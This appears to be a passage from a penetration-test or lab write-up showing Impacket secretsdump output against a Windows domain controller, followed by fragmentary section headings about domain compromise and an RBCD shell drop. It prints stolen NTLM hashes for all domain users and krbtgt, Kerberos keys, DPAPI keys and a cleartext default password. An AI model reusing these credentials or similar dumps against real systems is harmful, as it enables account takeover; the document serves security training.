Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x731c888adb6f9f25711d55f1c1463b88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d35c4ae45bdd10a4e28ff529a2155745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NARASEC\NARA$:plain_password_hex:b620cc6139bf0c25bfea542b4588fbf4fdc8ec0cd3cdfb88d597d807be81b637ea75209b5a4f14a2a611a1ed67fab21496a72c7ba2ec61c2e5bd4c384f7827be9f63caa3e8610b8c9addc42f82721cad002e90f014f7ddf5f0e8616e8c1ed688a504f754e24b83c9a6a59f4c31b2dbcd01f1f3572c6f9e0d2616f6bc5125819746e9ad9603792900bcd5b6148497b1bedfbd7d1d3ea4e28bf71e8bc507c2736e605d7e22cd04061365be209fb9ab8e6aa924eda3e9541be0d477b022d9dd1e3b12ca36a13d3782afc78199b8cba0b577d1709f2a5d7cb68f6e4feab3899b67f1605021ea8aac18d890c6073769ba4bb1
NARASEC\NARA$:aad3b435b51404eeaad3b435b51404ee:d78b968a49f9612f83797d3138220092:::
[*] DefaultPassword 
NARASEC\tracy.white:zqwj041FGX
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xa2966c2958c321ccc4470b54f485be069a050bc1
dpapi_userkey:0x5a6ed63075d897d7d3224c2c9b9cdcc254788003
[*] NL$KM 
 0000   08 9C 22 67 0B 44 1F 61  34 42 2A F7 DC 66 1E 24   .."g.D.a4B*..f.$
 0010   F3 1D CF 25 9C 00 4D 32  DF 02 F7 91 FA E6 12 92   ...%..M2........
 0020   CB 10 C4 83 14 A4 18 F6  EE F7 E2 5C AE AF 19 EA   ...........\....
 0030   56 F1 C2 9A 99 A6 8E 0A  11 48 D2 D7 07 70 52 2D   V........H...pR-
NL$KM:089c22670b441f6134422af7dc661e24f31dcf259c004d32df02f791fae61292cb10c48314a418f6eef7e25caeaf19ea56f1c29a99a68e0a1148d2d70770522d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3f85c2c9778ce40492f6ac891f76b4ca:::
nara-security.com\Amelia.O'Brien:1104:aad3b435b51404eeaad3b435b51404ee:2a3bc4e4f627ae18128b63ca338249fb:::
nara-security.com\Damian.Johnson:1105:aad3b435b51404eeaad3b435b51404ee:6037e9a69dfa966cd902e35a5bd17568:::
nara-security.com\Helen.Robinson:1106:aad3b435b51404eeaad3b435b51404ee:3bef7be42235aeadf25df04f90c6e3d7:::
nara-security.com\Sara.O'Sullivan:1107:aad3b435b51404eeaad3b435b51404ee:bec726c5bea2f63e4798e0a559c53453:::
nara-security.com\Jasmine.Roberts:1108:aad3b435b51404eeaad3b435b51404ee:3d24b27a9beba394589bcefa51319e02:::
nara-security.com\Declan.Reynolds:1109:aad3b435b51404eeaad3b435b51404ee:ee174ee61eadd9b1f3d1f3225037068d:::
nara-security.com\Jodie.Summers:1110:aad3b435b51404eeaad3b435b51404ee:a241c861f1bfb5e2ae04c9e843304318:::
nara-security.com\Carolyn.Hill:1111:aad3b435b51404eeaad3b435b51404ee:d65fad2e9d1cf1c44de25751c60e37f6:::
nara-security.com\Jemma.Humphries:1112:aad3b435b51404eeaad3b435b51404ee:2884cf969a8cd830da7559ee60c9dd3c:::
nara-security.com\Tracy.White:1113:aad3b435b51404eeaad3b435b51404ee:510037c67d52760ca076ef199fd26c51:::
NARA$:1000:aad3b435b51404eeaad3b435b51404ee:d78b968a49f9612f83797d3138220092:::
RBCD$:4601:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d9c06207ad449f679fcbcf7f8b2a54bc51139c64886dc6e123bdef569a828ad
Administrator:aes128-cts-hmac-sha1-96:0524697dc50b6facd6b72816b81092f2
Administrator:des-cbc-md5:d62676a29132d3dc
krbtgt:aes256-cts-hmac-sha1-96:6a69065d5bb66d8691a68e4a6baf4a4faf1a9db55519f394f56a8b3bffabe6a7
krbtgt:aes128-cts-hmac-sha1-96:40529a633c381f50435f82afd2c72614
krbtgt:des-cbc-md5:07df379e5b9e1afb
nara-security.com\Amelia.O'Brien:aes256-cts-hmac-sha1-96:efec45ff5ec03ad84fe1143ea5bbfa4472da4bc9978f48bafd6faeb800ddafa9
nara-security.com\Amelia.O'Brien:aes128-cts-hmac-sha1-96:90f0e123d917b5ae148570002a9ea68e
nara-security.com\Amelia.O'Brien:des-cbc-md5:e5c223ecd5c2a43b
nara-security.com\Damian.Johnson:aes256-cts-hmac-sha1-96:62eea72684a4c953644088f6eacdc10057542c4788c76bb853c8e9add298d933
nara-security.com\Damian.Johnson:aes128-cts-hmac-sha1-96:0bf5e1335518ae078364966f3f9a10d0
nara-security.com\Damian.Johnson:des-cbc-md5:6bb5a4b9e69b5d4c
nara-security.com\Helen.Robinson:aes256-cts-hmac-sha1-96:2fcd5f444651395d2dd0613791d1642578972137b277a4f04e5a7258d46ef5be
nara-security.com\Helen.Robinson:aes128-cts-hmac-sha1-96:5ed26dbf8e08910824a2b17767b13a54
nara-security.com\Helen.Robinson:des-cbc-md5:01c87a37d626f2f1
nara-security.com\Sara.O'Sullivan:aes256-cts-hmac-sha1-96:7518292bd462ed5d97c3467654d40213ecf706a0e86c4fb187d400ef97b89cba
nara-security.com\Sara.O'Sullivan:aes128-cts-hmac-sha1-96:f352274b2986a2e59d906a374fb85d8a
nara-security.com\Sara.O'Sullivan:des-cbc-md5:1f68401ac8673134
nara-security.com\Jasmine.Roberts:aes256-cts-hmac-sha1-96:95437346669685bc1bcbe515c38b2328d572b3ef0f53b880eb601a77d8ac5f93
nara-security.com\Jasmine.Roberts:aes128-cts-hmac-sha1-96:4f4a6b1665c6becce02164ef8a0ef278
nara-security.com\Jasmine.Roberts:des-cbc-md5:9b79b0fe9e025429
nara-security.com\Declan.Reynolds:aes256-cts-hmac-sha1-96:a0002536a0df7e30f25d2c20e8db408c12b5d656dee51ed36713dd60e12156e1
nara-security.com\Declan.Reynolds:aes128-cts-hmac-sha1-96:e9afb0e76f48fbfdd11dabc4303bc5b4
nara-security.com\Declan.Reynolds:des-cbc-md5:da2a86383b7a7c80
nara-security.com\Jodie.Summers:aes256-cts-hmac-sha1-96:20bf3cff2382312f3208f15115e4ab4e4166cee06eda65944a54395bcf623880
nara-security.com\Jodie.Summers:aes128-cts-hmac-sha1-96:482940121e3bf4c831e196a75c281288
nara-security.com\Jodie.Summers:des-cbc-md5:3ed0761fb337e667
nara-security.com\Carolyn.Hill:aes256-cts-hmac-sha1-96:eaa5f10ff42d92692a94cce7f979673214244fbeaefa72698c8605dda550fdfe
nara-security.com\Carolyn.Hill:aes128-cts-hmac-sha1-96:401579f65b47951a68c89a7072387f91
nara-security.com\Carolyn.Hill:des-cbc-md5:7343cd573180e9c7
nara-security.com\Jemma.Humphries:aes256-cts-hmac-sha1-96:ceca930e1aafbaf1e577dbafc3900b57b4eff2a0456d81e6f63eed78ddf37667
nara-security.com\Jemma.Humphries:aes128-cts-hmac-sha1-96:05f014977e7d8cde1e5329de97afd4f9
nara-security.com\Jemma.Humphries:des-cbc-md5:37e6f2106b7a9e75
nara-security.com\Tracy.White:aes256-cts-hmac-sha1-96:9e562dc6076f467d1906674f24e5a5a3760c5f07a509b5d194b3bfb864398d70
nara-security.com\Tracy.White:aes128-cts-hmac-sha1-96:ce3dc29bc3fa5e792086e594a2fe07f8
nara-security.com\Tracy.White:des-cbc-md5:322502078943d568
NARA$:aes256-cts-hmac-sha1-96:248be7240f10b250962e6abaf868bd9b9de688e296dceb0533b86bd8ad282543
NARA$:aes128-cts-hmac-sha1-96:bbdf7381cdd8ed61f42b48b89f42bed2
NARA$:des-cbc-md5:6d64d38c2c206d3e
RBCD$:aes256-cts-hmac-sha1-96:0e7d5adeb7d9616040956c566c0263b2a3ca2c0e33b8f12ce69ea70c5e648f57
RBCD$:aes128-cts-hmac-sha1-96:9569c17a2bfedebdd7cd69b026b72349
RBCD$:des-cbc-md5:2a7fd015ecfe2a04
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Shell Drop (RBCD)

---

System level compromise